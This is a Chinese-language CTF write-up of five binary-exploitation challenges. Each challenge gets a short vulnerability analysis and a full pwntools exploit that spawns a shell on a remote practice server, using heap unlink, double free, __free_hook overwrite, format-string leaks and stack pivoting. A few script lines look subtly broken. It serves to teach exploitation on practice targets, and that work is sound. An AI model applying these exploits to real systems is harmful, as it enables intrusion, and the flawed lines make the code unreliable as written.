目录
picoctf_2018_are you root(程序逻辑错误)
例行安全检查
菜单如下:
我们需要auth_level等于5才能get flag
user结构体如下
struct USER{
char *name;
long long auth_level;
}
漏洞原理分析:
在login中分配了两次内存,第一次是存储user结构体,第二次是存储姓名
在reset中只是释放了name,并在name的地址置为空,此时该chunk进入tcache,下次login时还会再申请一次user结构体,此时名字中超过8字节的部分就被当成auth_level了
漏洞利用:
我们先login一下,查看分配的内存
然后reset,再重新登陆
发现名字中超过8字节的部分被当做了auth_level
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 27815)
#r = process('./PicoCTF_2018_are_you_root')
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *0x400E46
b *0x400AF5
c
''')
r.recvuntil('> ')
r.sendline('login aaaaaaaa\x05')
r.recvuntil('> ')
r.sendline('reset')
r.recvuntil('> ')
r.sendline('login root')
r.recvuntil('> ')
r.sendline('get-flag')
r.interactive()
axb_2019_heap(格式化字符串,off-by-one,unlink)
漏洞分析:
banner中的格式化字符串漏洞
get_input中可以溢出一个byte(任意byte而不是’\x00‘)
漏洞利用:
- 利用格式化字符串漏洞泄露Libc地址和代码段地址
- 申请三个大小为8的奇数倍的note,第三个内容为/bin/sh
- 编辑note[0],伪造chunk,fd为bss上的note数组地址-0x18,bk位bss上note数组地址-0x10,并修改下一个chunk的presize和size
- 释放note[1],此时通过unlink欺骗note[0]中存储地址为数组地址-0x18
- edit note[0],把note[0]content的地址改为__free_hook,修改__free_hook为system地址并释放note[2]
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 28423)
#r = process("./axb_2019_heap")
context.log_level = 'debug'
elf = ELF("./axb_2019_heap")
libc = ELF('./libc/libc-2.23.so')
def add(index, size, content):
r.recvuntil(">> ")
r.sendline('1')
r.recvuntil("Enter the index you want to create (0-10):")
r.sendline(str(index))
r.recvuntil("Enter a size:\n")
r.sendline(str(size))
r.recvuntil("Enter the content: \n")
r.send(content)
def delete(index):
r.recvuntil(">> ")
r.sendline('2')
r.recvuntil("Enter an index:\n")
r.sendline(str(index))
def edit(index, content):
r.recvuntil(">> ")
r.sendline('4')
r.recvuntil("Enter an index:\n")
r.sendline(str(index))
r.recvuntil("Enter the content: \n")
r.sendline(content)
r.recvuntil("Enter your name: ")
name = '%11$p%15$p'
r.sendline(name)
r.recvuntil('0x')
elf_base = int(r.recv(12), 16) - 0x1186
success("elf_base:"+hex(elf_base))
heap = elf_base + 0x202060
r.recvuntil('0x')
start_main = int(r.recv(12), 16) - 0xf0
libc_base = start_main - libc.sym['__libc_start_main']
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success("start+main"+hex(start_main))
success("libc_base:"+hex(libc_base))
payload = p64(0) + p64(0x81) + p64(heap-0x18) + p64(heap-0x10) + 'a'*0x60 + p64(0x80) + '\x90'
add(0, 0x88, 'a'*0x87+'\n')
add(1, 0x88, 'a'*0x87+'\n')
add(2, 0x88, '/bin/sh'+'\n')
edit(0, payload)
delete(1)
payload = p64(0)*3 + p64(free_hook) + p64(8) + '\n'
edit(0, payload)
edit(0, p64(system)+'\n')
delete(2)
r.interactive()
ciscn_2019_s_4(泄露ebp,栈迁移)
漏洞利用:
- 填充满缓冲区,泄露ebp
- 使用栈迁移执行system
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 28496)
#r = process("./ciscn_2019_s_4")
elf = ELF("./ciscn_2019_s_4")
leave = 0x080485FD
ret = 0x080485FE
system = elf.plt['system']
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *0x080485CD
b *0x080485FE
c
''')
r.recvuntil("Welcome, my friend. What's your name?\n")
payload = 'a' * 0x27 + '\n'
r.send(payload)
r.recvuntil("Hello, ")
r.recvuntil('\n')
leak = u32(r.recv(4))
input_addr = leak - 0x38
success("input:"+hex(input_addr))
payload = 'aaaa' + p32(system)*2 + p32(input_addr+0x10) + '/bin/sh\x00'
payload = payload.ljust(0x28, 'a') + p32(input_addr) + p32(leave)
r.send(payload)
r.interactive()
ciscn_2019_s_9(puts泄露libc)
hint给了一个jmp esp
程序又没开NX,推测需要自己写shellcode
除去ebp和返回地址,我们的shellcode长度最长为18
漏洞利用:
说实话这题的提示太有误导性了,差点就以为要写shellcode了···
- 利用puts 泄露Libc地址,并重新执行vul()
- 使用system()获取shell
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 28214)
#r = process("./ciscn_2019_s_9")
context.log_level = 'debug'
elf = ELF("./ciscn_2019_s_9")
libc = ELF('./libc/libc-2.27_32.so')
puts = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x08048559
r.recvuntil(">\n")
payload = 'a' * 0x24 + p32(puts) + p32(main) + p32(puts_got)
r.sendline(payload)
r.recvuntil("OK bye~\n")
puts_addr = u32(r.recv(4))
libc_base = puts_addr - libc.sym['puts']
system = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search("/bin/sh").next()
success("libc_base:"+hex(libc_base))
success("system:" + hex(system))
success("bin_sh" + hex(bin_sh))
r.recvuntil(">\n")
payload = 'a' * 0x24 + p32(system)*2 + p32(bin_sh).sendline(payload)
r.interactive()
ciscn_2019_en_3(栈信息泄露,double free)
delete之后指针没有置空
调试程序,发现libc中setbuffer+231的地址留在了栈上,而该地址正好在ID之后
所以只要ID长度为8,就能泄露出该地址
漏洞利用·:
- 用上述办法泄露libc地址
- 申请两个note,note[1]内容为/bin/sh
- 对note[0]进行double free并House of spirit申请出__free_hook,改为system
- 释放note[1],获取shell
Exp:
from pwn import *
r = remote("node3.buuoj.cn", 29783)
#r = process("./ciscn_2019_en_3")
context.log_level = 'debug'
elf = ELF("./ciscn_2019_en_3")
libc = ELF('./libc/libc-2.27.so')
def add(size, content):
r.recvuntil("Input your choice:")
r.sendline('1')
r.recvuntil("Please input the size of story: \n")
r.sendline(str(size))
r.recvuntil("please inpute the story: \n")
r.send(content)
def delete(index):
r.recvuntil("Input your choice:")
r.sendline('4')
r.recvuntil("Please input the index:\n")
r.sendline(str(index))
def edit(index, content):
r.recvuntil("Input your choice:")
r.sendline('4')
r.recvuntil("Enter an index:\n")
r.sendline(str(index))
r.recvuntil("Enter the content: \n")
r.sendline(content)
r.recvuntil("What's your name?\n")
name = 'aaaaaa'
r.sendline(name)
r.recvuntil("Please input your ID.\n")
r.sendline('a'*8)
r.recvuntil('a'*8)
libc_base = u64(r.recvuntil('\x7f').ljust(8,'\x00')) - 231 - libc.sym['setbuffer']
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
success("libc_base:"+hex(libc_base))
add(0x20, 'aaaa\n')
add(0x20, '/bin/sh\n')
delete(0)
delete(0)
add(0x20, p64(free_hook)+'\n')
add(0x20, p64(free_hook)+'\n')
add(0x20, p64(system)+'\n')
delete(1)
r.interactive()
